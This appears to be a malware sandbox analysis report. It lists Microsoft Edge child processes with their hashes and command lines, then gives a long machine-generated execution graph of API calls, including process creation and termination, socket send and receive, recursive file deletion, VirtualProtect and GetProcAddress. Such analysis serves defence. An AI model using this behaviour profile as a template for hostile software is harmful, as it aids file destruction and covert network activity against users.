                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3104 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                                                                                            Start time:02:39:22
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6724 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                                                                                            Start time:02:39:22
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6868 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                                                                                            Start time:02:39:23
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                                                                                            Start time:02:39:23
                                                                                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6336 --field-trial-handle=2836,i,2011018935982799197,10910511226691578411,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                                            File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                                            MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                            Has exited:true


                                                                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                                                                              Execution Coverage:6%
                                                                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:62.4%
                                                                                                                                                                                                                                                                                                                              Signature Coverage:16.3%
                                                                                                                                                                                                                                                                                                                              Total number of Nodes:1371
                                                                                                                                                                                                                                                                                                                              Total number of Limit Nodes:87
67586->67472 67597->67505 67598->67482 67600->67491 67602 10004979 67601->67602 67603 100048a9 67601->67603 67629 1000a5c6 28 API calls 2 library calls 67602->67629 67604 10004983 67603->67604 67605 100048c5 67603->67605 67630 1000a5a6 28 API calls 2 library calls 67604->67630 67608 1000498d 67605->67608 67609 100048dc 67605->67609 67613 100048ea 67605->67613 67631 1000a5a6 28 API calls 2 library calls 67608->67631 67612 100046f0 28 API calls 67609->67612 67609->67613 67612->67613 67613->67524 67615 10004726 67614->67615 67616 1000476f 67615->67616 67625 1000475f 67615->67625 67639 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 67615->67639 67618 10004798 67616->67618 67619 10004778 67616->67619 67632 1000a5f3 67618->67632 67620 10004784 67619->67620 67640 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 67619->67640 67624 1000a5f3 new 22 API calls 67620->67624 67623 10004160 28 API calls 67626 10004800 67623->67626 67624->67625 67625->67623 67625->67626 67626->67522 67629->67604 67636 1000a5f8 67632->67636 67634 1000a624 67634->67625 67636->67634 67641 1000dafb 67636->67641 67648 10014867 7 API calls 2 library calls 67636->67648 67649 1000ae00 RaiseException __CxxThrowException@8 new 67636->67649 67650 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 67636->67650 67646 10015a9f IsInExceptionSpec 67641->67646 67642 10015add 67652 100160ec 20 API calls __dosmaperr 67642->67652 67644 10015ac8 RtlAllocateHeap 67645 10015adb 67644->67645 67644->67646 67645->67636 67646->67642 67646->67644 67651 10014867 7 API calls 2 library calls 67646->67651 67648->67636 67651->67646 67652->67645 67653->67546 67654->67537 67655->67539 67658 10006db1 67657->67658 67659 10006dd6 67657->67659 67658->67659 67660 10006dbc 67658->67660 67661 10004890 28 API calls 67659->67661 67687 10005a30 28 API calls 2 library calls 67660->67687 67663 10006de2 67661->67663 67663->67580 67664 10006dc7 67664->67580 
67666 100039c6 67665->67666 67667 1000397e 67665->67667 67668 100039d6 67666->67668 67669 10003a5e 67666->67669 67667->67666 67674 100039a5 67667->67674 67671 100046f0 28 API calls 67668->67671 67673 100039e6 67668->67673 67688 1000a5a6 28 API calls 2 library calls 67669->67688 67671->67673 67673->67556 67675 10003a70 28 API calls 67674->67675 67676 100039c0 67675->67676 67676->67556 67677->67568 67679 100034c1 67678->67679 67681 100034d3 67678->67681 67680 10003970 28 API calls 67679->67680 67682 100034cc 67680->67682 67683 10003970 28 API calls 67681->67683 67682->67564 67684 100034f9 67683->67684 67684->67564 67685->67568 67686->67580 67687->67664 67690 10002f82 67691 10002f8d 67690->67691 67695 10002fb9 67690->67695 67692 10002f97 67691->67692 67772 1000daab 26 API calls __cftof 67691->67772 67694 10002fa3 67692->67694 67773 1000daab 26 API calls __cftof 67692->67773 67697 10002faf 67694->67697 67774 1000daab 26 API calls __cftof 67694->67774 67699 10002ff7 67695->67699 67703 10003019 67695->67703 67776 1000daab 26 API calls __cftof 67695->67776 67697->67695 67775 1000daab 26 API calls __cftof 67697->67775 67705 10003003 67699->67705 67777 1000daab 26 API calls __cftof 67699->67777 67700 100030df 67717 1000315a 67700->67717 67724 10003138 67700->67724 67788 1000daab 26 API calls __cftof 67700->67788 67704 10003057 67703->67704 67708 10003079 67703->67708 67780 1000daab 26 API calls __cftof 67703->67780 67714 10003063 67704->67714 67781 1000daab 26 API calls __cftof 67704->67781 67716 1000300f 67705->67716 67778 1000daab 26 API calls __cftof 67705->67778 67708->67700 67711 100030bd 67708->67711 67784 1000daab 26 API calls __cftof 67708->67784 67712 100030c9 67711->67712 67785 1000daab 26 API calls __cftof 67711->67785 67721 100030d5 67712->67721 67786 1000daab 26 API calls __cftof 67712->67786 67715 1000306f 67714->67715 67782 1000daab 26 API calls __cftof 67714->67782 67715->67708 67783 1000daab 26 API calls __cftof 67715->67783 67716->67703 67779 1000daab 26 
API calls __cftof 67716->67779 67718 1000317b 67717->67718 67736 100031c0 67717->67736 67792 10003dc0 67718->67792 67721->67700 67787 1000daab 26 API calls __cftof 67721->67787 67728 10003144 67724->67728 67789 1000daab 26 API calls __cftof 67724->67789 67731 10003150 67728->67731 67790 1000daab 26 API calls __cftof 67728->67790 67731->67717 67791 1000daab 26 API calls __cftof 67731->67791 67732 100031a2 67808 100036c0 67732->67808 67738 10003220 67736->67738 67744 100086b0 67736->67744 67737 100031ad 67739 100036c0 26 API calls 67738->67739 67740 10003241 67739->67740 67741 100036c0 26 API calls 67740->67741 67742 10003258 67741->67742 67745 100086c2 67744->67745 67746 1000870b 67744->67746 67747 10008911 67745->67747 67748 100086cd select 67745->67748 67749 10008774 select 67746->67749 67752 100087a0 67746->67752 67747->67736 67748->67736 67749->67752 67751 100087b5 recv 67751->67752 67753 100087d2 WSAGetLastError 67751->67753 67756 1000880b 67752->67756 67759 100097d0 28 API calls 67752->67759 67819 100097d0 67752->67819 67754 10008800 67753->67754 67755 100087df WSAGetLastError 67753->67755 67757 100097d0 28 API calls 67754->67757 67755->67752 67755->67754 67758 100097d0 28 API calls 67756->67758 67770 10008809 ___BuildCatchObject 67757->67770 67760 10008811 closesocket 67758->67760 67759->67752 67761 10008828 67760->67761 67823 1000fc8d 65 API calls 2 library calls 67761->67823 67762 100088bf 67762->67747 67765 10008901 closesocket 67762->67765 67764 10008850 send 67766 1000886b WSAGetLastError 67764->67766 67764->67770 67765->67747 67766->67762 67768 1000887a WSAGetLastError 67766->67768 67767 100088c1 closesocket 67769 100088d8 67767->67769 67768->67762 67768->67770 67824 1000fc8d 65 API calls 2 library calls 67769->67824 67770->67762 67770->67764 67770->67767 67793 10003e25 67792->67793 67798 10003dce 67792->67798 67794 10003eab 67793->67794 67795 10003e2e 67793->67795 67845 1000a5a6 28 API calls 2 library calls 67794->67845 67800 10003e3e 67795->67800 
67828 10004460 67795->67828 67798->67793 67801 10003df4 67798->67801 67800->67732 67802 10003df9 67801->67802 67803 10003e0f 67801->67803 67826 10003ec0 28 API calls std::_Xinvalid_argument 67802->67826 67827 10003ec0 28 API calls std::_Xinvalid_argument 67803->67827 67806 10003e09 67806->67732 67807 10003e1f 67807->67732 67809 100036cb 67808->67809 67810 100036ed 67808->67810 67809->67810 67811 100036da 67809->67811 67851 1000daab 26 API calls __cftof 67809->67851 67810->67737 67813 100036e1 67811->67813 67852 1000daab 26 API calls __cftof 67811->67852 67815 100036e8 67813->67815 67853 1000daab 26 API calls __cftof 67813->67853 67815->67810 67854 1000daab 26 API calls __cftof 67815->67854 67820 100097e7 67819->67820 67822 100097f5 ___scrt_fastfail 67819->67822 67820->67822 67825 10009900 28 API calls std::_Xinvalid_argument 67820->67825 67822->67751 67823->67770 67824->67762 67825->67822 67826->67806 67827->67807 67829 10004493 67828->67829 67830 100044f7 67829->67830 67832 100044d7 67829->67832 67837 100044cc 67829->67837 67833 1000a5f3 new 22 API calls 67830->67833 67831 100044e3 67835 1000a5f3 new 22 API calls 67831->67835 67832->67831 67846 1000ade3 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 67832->67846 67833->67837 67835->67837 67836 10004568 67839 10004574 67836->67839 67848 1000daab 26 API calls __cftof 67836->67848 67837->67836 67840 1000458a 67837->67840 67847 1000daab 26 API calls __cftof 67837->67847 67842 10004580 67839->67842 67849 1000daab 26 API calls __cftof 67839->67849 67840->67800 67842->67840 67850 1000daab 26 API calls __cftof 67842->67850 70409 4260a1 70414 42611e send 70409->70414 70415 425e66 70416 425e7b 70415->70416 70419 425f1b 70415->70419 70417 425f35 70416->70417 70418 425f6a 70416->70418 70416->70419 70420 425ec9 70416->70420 70421 425f87 70416->70421 70422 425fae 70416->70422 70427 425efe 70416->70427 70443 424364 48 API calls ctype 70416->70443 70417->70418 70417->70419 70446 41f085 52 API calls 
70417->70446 70418->70421 70447 424b8b 21 API calls 70418->70447 70420->70419 70420->70427 70444 41f085 52 API calls 70420->70444 70421->70419 70421->70422 70431 424f88 70421->70431 70422->70419 70448 4255d7 28 API calls 70422->70448 70427->70417 70427->70419 70445 424364 48 API calls ctype 70427->70445 70432 424fa7 ___scrt_fastfail 70431->70432 70434 424fb6 70432->70434 70438 424fdb 70432->70438 70449 41e0a7 21 API calls 70432->70449 70434->70438 70442 424fbb 70434->70442 70450 41fae4 45 API calls 70434->70450 70437 424fc4 70437->70438 70452 424195 21 API calls 2 library calls 70437->70452 70438->70422 70440 42505e 70440->70438 70441 431fa9 21 API calls 70440->70441 70441->70442 70442->70437 70442->70438 70451 41cf7e 48 API calls 70442->70451 70443->70420 70444->70420 70445->70417 70446->70417 70447->70421 70448->70419 70449->70434 70450->70440 70451->70437 70452->70438 70453 10015a65 70454 10015a70 RtlFreeHeap 70453->70454 70458 10015a99 _free 70453->70458 70455 10015a85 70454->70455 70454->70458 70459 100160ec 20 API calls __dosmaperr 70455->70459 70457 10015a8b GetLastError 70457->70458 70459->70457 70460 283c7a7 70461 283c7be 70460->70461 70465 283c81c 70460->70465 70461->70465 70471 283c7e6 GetModuleHandleA 70461->70471 70463 283c872 70464 283c835 GetModuleHandleA 70466 283c83f 70464->70466 70465->70463 70465->70464 70465->70466 70466->70465 70467 283c85f GetProcAddress 70466->70467 70467->70465 70472 283c7ef 70471->70472 70479 283c81c 70471->70479 70482 283c803 GetProcAddress 70472->70482 70474 283c872 70475 283c835 GetModuleHandleA 70480 283c83f 70475->70480 70479->70474 70479->70475 70479->70480 70480->70479 70481 283c85f GetProcAddress 70480->70481 70481->70479 70483 283c81c 70482->70483 70484 283c80d VirtualProtect 70482->70484 70485 283c872 70483->70485 70486 283c835 GetModuleHandleA 70483->70486 70484->70483 70488 283c83f 70486->70488 70487 283c85f GetProcAddress 70487->70488 70488->70483 70488->70487 70489 1000ac67 70490 1000ac73 
___DestructExceptionObject 70489->70490 70491 1000ac9c dllmain_raw 70490->70491 70493 1000ac97 70490->70493 70494 1000ac82 ___DestructExceptionObject 70490->70494 70492 1000acb6 dllmain_crt_dispatch 70491->70492 70491->70494 70492->70493 70492->70494 70502 10006e40 70493->70502 70497 1000ad03 70497->70494 70498 1000ad0c dllmain_crt_dispatch 70497->70498 70498->70494 70500 1000ad1f dllmain_raw 70498->70500 70499 10006e40 12 API calls 70501 1000acef dllmain_crt_dispatch dllmain_raw 70499->70501 70500->70494 70501->70497 70503 10006e49 70502->70503 70504 10006e4e 70502->70504 70506 10007240 12 API calls 70503->70506 70504->70497 70504->70499 70507 100072d7 70506->70507 70507->70504 67855 100012cb 67856 10004160 28 API calls 67855->67856 67857 100012d5 67856->67857 68013 10005f20 67857->68013 67860 10001315 67861 10001354 67860->67861 67862 10004160 28 API calls 67860->67862 68024 10006020 67861->68024 67862->67861 67864 10004160 28 API calls 67864->67860 67866 10001380 67867 100013bf 67866->67867 67870 10004160 28 API calls 67866->67870 68035 10006120 67867->68035 67869 10004160 28 API calls 67869->67866 67870->67867 67872 100013e8 67873 10001421 67872->67873 67875 10004160 28 API calls 67872->67875 68046 10005c00 67873->68046 67874 10004160 28 API calls 67874->67872 67875->67873 67878 10003a70 28 API calls 67879 10001471 67878->67879 67880 100067d0 31 API calls 67879->67880 67881 1000147c 67880->67881 67882 10003a70 28 API calls 67881->67882 67883 100014be 67882->67883 67884 100067d0 31 API calls 67883->67884 67885 100014c9 67884->67885 67886 10003a70 28 API calls 67885->67886 67887 1000150b 67886->67887 67888 100067d0 31 API calls 67887->67888 67889 10001516 67888->67889 68081 10007a40 CreateFileW 67889->68081 67891 10001539 67892 10003a70 28 API calls 67891->67892 67893 10001577 67892->67893 67894 10003a70 28 API calls 67893->67894 67906 100015bc 67894->67906 67897 100017ea 67899 1000180b Sleep 67897->67899 67919 10001815 67897->67919 68131 10007e20 67897->68131 
67898 10003a70 28 API calls 67898->67906 67899->67897 67899->67919 67901 10003a70 28 API calls 67901->67919 67903 10004160 28 API calls 67903->67906 67904 10004c10 28 API calls 67904->67906 67906->67897 67906->67898 67906->67903 67906->67904 67906->67919 68090 10006220 67906->68090 68109 100025a0 67906->68109 68167 10003ff0 28 API calls std::_Xinvalid_argument 67906->68167 67907 10007e20 9 API calls 67908 10001adb 67907->67908 67908->67907 67910 10001b05 67908->67910 67911 10001afb Sleep 67908->67911 67913 10003a70 28 API calls 67910->67913 67911->67908 67911->67910 67914 10001b46 67913->67914 67916 10003a70 28 API calls 67914->67916 67915 100025a0 43 API calls 67915->67919 67920 10001b8b 67916->67920 67917 10004160 28 API calls 67917->67919 67918 10004c10 28 API calls 67918->67919 67919->67901 67919->67908 67919->67915 67919->67917 67919->67918 68143 100063b0 67919->68143 68168 1000daab 26 API calls __cftof 67919->68168 68169 1000a5c6 28 API calls 2 library calls 67919->68169 68170 10003ff0 28 API calls std::_Xinvalid_argument 67919->68170 67922 10001c5c 67920->67922 67945 10001bb1 67920->67945 68154 10007de0 67922->68154 67931 10001c9c 68178 10004be0 28 API calls 67931->68178 67933 100025a0 43 API calls 67933->67945 67934 10001cb5 68179 10004be0 28 API calls 67934->68179 67937 10001cd0 68180 10004be0 28 API calls 67937->68180 67939 10001ce9 68181 10004be0 28 API calls 67939->68181 67942 10001d04 68182 10004be0 28 API calls 67942->68182 67943 10004c10 28 API calls 67943->67945 67945->67922 67945->67933 67945->67943 67950 100036c0 26 API calls 67945->67950 68171 100033e0 28 API calls 67945->68171 68172 10003500 28 API calls 67945->68172 68173 100064b0 36 API calls 67945->68173 68174 10003730 26 API calls 67945->68174 68175 10003460 28 API calls 67945->68175 68176 100036a0 28 API calls 67945->68176 67946 10001d1d 68183 10004be0 28 API calls 67946->68183 67949 10001d38 68184 10004be0 28 API calls 67949->68184 67950->67945 67952 10001d51 68185 10004be0 28 API calls 
67952->68185 67954 10001d69 68186 10004be0 28 API calls 67954->68186 67956 10001d7f 68187 10004be0 28 API calls 67956->68187 67958 10001d9a 67959 100036c0 26 API calls 67958->67959 67960 10001da5 67959->67960 67961 100036c0 26 API calls 67960->67961 67962 10001dad 67961->67962 67963 100036c0 26 API calls 67962->67963 67964 10001db8 67963->67964 67965 100036c0 26 API calls 67964->67965 67966 10001dc3 67965->67966 67967 100036c0 26 API calls 67966->67967 67968 10001dce 67967->67968 67969 100036c0 26 API calls 67968->67969 67970 10001dd9 67969->67970 67971 100036c0 26 API calls 67970->67971 67972 10001de4 67971->67972 67973 100036c0 26 API calls 67972->67973 67974 10001def 67973->67974 67975 100036c0 26 API calls 67974->67975 67976 10001dfa 67975->67976 67977 100036c0 26 API calls 67976->67977 67978 10001e05 67977->67978 67979 100036c0 26 API calls 67978->67979 67980 10001e10 67979->67980 68188 100038d0 28 API calls 67980->68188 67982 10001e1b 68189 100038d0 28 API calls 67982->68189 67984 10001e26 68190 100038d0 28 API calls 67984->68190 67986 10001e31 68191 10003460 28 API calls 67986->68191 67988 10001e3c 68192 10003460 28 API calls 67988->68192 67990 10001e44 68193 10003460 28 API calls 67990->68193 67992 10001e4f 68194 10003460 28 API calls 67992->68194 67994 10001e5a 68195 10003460 28 API calls 67994->68195 67996 10001e65 67997 100036c0 26 API calls 67996->67997 67998 10001e70 67997->67998 67999 100036c0 26 API calls 67998->67999 68000 10001e7b 67999->68000 68001 100036c0 26 API calls 68000->68001 68002 10001e86 68001->68002 68003 100036c0 26 API calls 68002->68003 68004 10001e8e 68003->68004 68005 100036c0 26 API calls 68004->68005 68006 10001e99 68005->68006 68007 100036c0 26 API calls 68006->68007 68008 10001ea4 68007->68008 68009 100036c0 26 API calls 68008->68009 68010 10001eaf 68009->68010 68011 100036c0 26 API calls 68010->68011 68012 10001eba 68011->68012 68014 10005f53 68013->68014 68015 10003970 28 API calls 68014->68015 68016 10005f99 68015->68016 
68017 10004330 28 API calls 68016->68017 68018 10005faf PathFileExistsW 68017->68018 68019 10005fd2 68018->68019 68021 10005fc7 68018->68021 68020 10003970 28 API calls 68019->68020 68020->68021 68022 100012f1 68021->68022 68023 10004160 28 API calls 68021->68023 68022->67860 68022->67864 68023->68022 68025 10006053 68024->68025 68026 10003970 28 API calls 68025->68026 68027 10006099 68026->68027 68028 10004330 28 API calls 68027->68028 68029 100060af PathFileExistsW 68028->68029 68030 100060d2 68029->68030 68032 100060c7 68029->68032 68031 10003970 28 API calls 68030->68031 68031->68032 68033 1000135c 68032->68033 68034 10004160 28 API calls 68032->68034 68033->67866 68033->67869 68034->68033 68036 10006153 68035->68036 68037 10003970 28 API calls 68036->68037 68038 10006199 68037->68038 68039 10004330 28 API calls 68038->68039 68040 100061af PathFileExistsW 68039->68040 68041 100061d2 68040->68041 68043 100061c7 68040->68043 68042 10003970 28 API calls 68041->68042 68042->68043 68044 100013c7 68043->68044 68045 10004160 28 API calls 68043->68045 68044->67872 68044->67874 68045->68044 68047 10005c37 68046->68047 68047->68047 68048 10003970 28 API calls 68047->68048 68049 10005c79 68048->68049 68050 10004330 28 API calls 68049->68050 68051 10005c8f 68050->68051 68052 10004d80 28 API calls 68051->68052 68053 10005c9f FindFirstFileW 68052->68053 68055 10005cc2 68053->68055 68056 10005ccc 68053->68056 68057 10004160 28 API calls 68055->68057 68058 10005d04 FindNextFileW 68056->68058 68059 10005ce5 68056->68059 68057->68056 68060 10005e96 FindClose 68058->68060 68071 10005d36 68058->68071 68061 10003970 28 API calls 68059->68061 68063 100034a0 28 API calls 68060->68063 68062 10005cff 68061->68062 68066 1000142c 68062->68066 68067 10004160 28 API calls 68062->68067 68079 10005ea9 68063->68079 68064 10005e84 FindNextFileW 68064->68060 68064->68071 68065 100036c0 26 API calls 68065->68062 68066->67878 68067->68066 68068 10003970 28 API calls 68068->68071 68069 10004d80 28 
API calls 68069->68071 68070 10006d90 28 API calls 68070->68071 68071->68064 68071->68068 68071->68069 68071->68070 68072 10004160 28 API calls 68071->68072 68073 10005e5c PathFileExistsW 68071->68073 68075 10004160 28 API calls 68071->68075 68076 10005e7a 68071->68076 68072->68071 68073->68071 68074 10005ed9 FindClose 68073->68074 68077 10005eeb 68074->68077 68075->68073 68078 10004160 28 API calls 68076->68078 68077->68079 68080 10004160 28 API calls 68077->68080 68078->68064 68079->68065 68080->68079 68082 10007a68 GetFileSize 68081->68082 68083 10007aca 68081->68083 68084 10007a94 68082->68084 68086 10007a7b ReadFile 68082->68086 68083->67891 68196 10008280 68084->68196 68088 10007ad2 CloseHandle 68086->68088 68089 10007ac4 CloseHandle 68086->68089 68088->67891 68089->68083 68091 10006253 68090->68091 68092 10003970 28 API calls 68091->68092 68093 10006299 68092->68093 68094 10003a70 28 API calls 68093->68094 68095 100062d0 68094->68095 68208 10007ae0 68095->68208 68098 10006300 68099 10006333 68098->68099 68101 10004160 28 API calls 68098->68101 68102 10004330 28 API calls 68099->68102 68100 10004160 28 API calls 68100->68098 68101->68099 68103 10006342 PathFileExistsW 68102->68103 68104 10006365 68103->68104 68106 1000635a 68103->68106 68105 10003970 28 API calls 68104->68105 68105->68106 68107 10006395 68106->68107 68108 10004160 28 API calls 68106->68108 68107->67906 68108->68107 68110 100025e4 ___scrt_fastfail 68109->68110 68221 10004ab0 68110->68221 68114 1000274a 68231 10004e80 68114->68231 68116 10002762 68117 10004cc0 28 API calls 68116->68117 68118 10002778 CreateProcessW 68117->68118 68120 100027bc 68118->68120 68234 10002b20 68120->68234 68123 10002a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 68124 10002acc 68123->68124 68127 100036c0 26 API calls 68124->68127 68126 1000296f 68128 10003860 28 API calls 68126->68128 68129 10002ad7 68127->68129 68130 10002983 68128->68130 68129->67906 68130->68123 68132 10007e40 68131->68132 
68132->68132 68133 10007ebc FindFirstFileW 68132->68133 68134 10008092 68133->68134 68139 10007ee2 68133->68139 68134->67897 68135 10007f02 FindNextFileW 68136 1000806d GetLastError 68135->68136 68135->68139 68137 10008078 FindClose RemoveDirectoryW 68136->68137 68138 1000808b FindClose 68136->68138 68137->67897 68138->68134 68139->68135 68139->68138 68140 10008021 SetFileAttributesW 68139->68140 68141 10008033 DeleteFileW 68139->68141 68142 10007fed RemoveDirectoryW 68139->68142 68140->68141 68141->68138 68141->68139 68142->68139 68144 100063e3 68143->68144 68145 10003970 28 API calls 68144->68145 68146 10006429 68145->68146 68147 10004330 28 API calls 68146->68147 68148 1000643f PathFileExistsW 68147->68148 68149 10006462 68148->68149 68151 10006457 68148->68151 68150 10003970 28 API calls 68149->68150 68150->68151 68152 10006492 68151->68152 68153 10004160 28 API calls 68151->68153 68152->67919 68153->68152 68155 10007df4 68154->68155 68156 10007e20 9 API calls 68155->68156 68157 10007e01 Sleep 68155->68157 68158 10001c6b 68155->68158 68156->68155 68157->68155 68157->68158 68159 10004c10 68158->68159 68160 10004c5e 68159->68160 68278 100050b0 68160->68278 68164 10004c92 68290 10003ff0 28 API calls std::_Xinvalid_argument 68164->68290 68166 10001c81 68177 10004be0 28 API calls 68166->68177 68167->67906 68169->67919 68170->67919 68171->67945 68172->67945 68173->67945 68174->67945 68175->67945 68176->67945 68177->67931 68178->67934 68179->67937 68180->67939 68181->67942 68182->67946 68183->67949 68184->67952 68185->67954 68186->67956 68187->67958 68188->67982 68189->67984 68190->67986 68191->67988 68192->67990 68193->67992 68194->67994 68195->67996 68197 10008352 68196->68197 68198 1000829a 68196->68198 68206 1000a5a6 28 API calls 2 library calls 68197->68206 68200 1000835c 68198->68200 68201 100082ae 68198->68201 68202 100082bc ___scrt_fastfail 68198->68202 68207 1000a5a6 28 API calls 2 library calls 68200->68207 68201->68202 68204 10004460 28 API calls 
68201->68204 68202->68086 68204->68202 68210 10007b1b 68208->68210 68209 10007bef 68212 100062e2 68209->68212 68214 10004160 28 API calls 68209->68214 68210->68209 68211 10003970 28 API calls 68210->68211 68213 10007b89 68211->68213 68212->68098 68212->68100 68220 10005130 28 API calls 2 library calls 68213->68220 68214->68212 68216 10007bbf 68217 10003a70 28 API calls 68216->68217 68218 10007bdd 68217->68218 68218->68209 68219 10004160 28 API calls 68218->68219 68219->68209 68220->68216 68225 10004afc 68221->68225 68222 10004330 28 API calls 68223 10004b57 68222->68223 68224 10004890 28 API calls 68223->68224 68226 10002734 68224->68226 68225->68222 68227 10004cc0 68226->68227 68228 10004ce0 68227->68228 68228->68228 68229 10004330 28 API calls 68228->68229 68230 10004d08 ___BuildCatchObject 68229->68230 68230->68114 68232 10004890 28 API calls 68231->68232 68233 10004ea2 ___BuildCatchObject 68232->68233 68233->68116 68235 10002b42 68234->68235 68268 10007310 LoadLibraryW 68235->68268 68237 10002b6f 68238 10002b75 68237->68238 68244 10002b96 68237->68244 68239 10003dc0 28 API calls 68238->68239 68243 10002b91 68239->68243 68240 100036c0 26 API calls 68241 10002951 68240->68241 68241->68123 68261 10003860 68241->68261 68242 10002bf2 GetLastError 68242->68243 68243->68240 68244->68242 68250 10002c15 68244->68250 68245 10002cd2 68273 10002db0 28 API calls 68245->68273 68246 10002d5b 68248 100036c0 26 API calls 68246->68248 68248->68243 68249 100036c0 26 API calls 68249->68246 68250->68245 68250->68246 68272 10003570 28 API calls std::_Xinvalid_argument 68250->68272 68251 10002cdd 68252 10002d29 68251->68252 68253 10002d07 68251->68253 68274 1000daab 26 API calls __cftof 68251->68274 68252->68249 68256 10002d13 68253->68256 68275 1000daab 26 API calls __cftof 68253->68275 68258 10002d1f 68256->68258 68276 1000daab 26 API calls __cftof 68256->68276 68258->68252 68277 1000daab 26 API calls __cftof 68258->68277 68262 1000387f 68261->68262 68265 10003891 68261->68265 
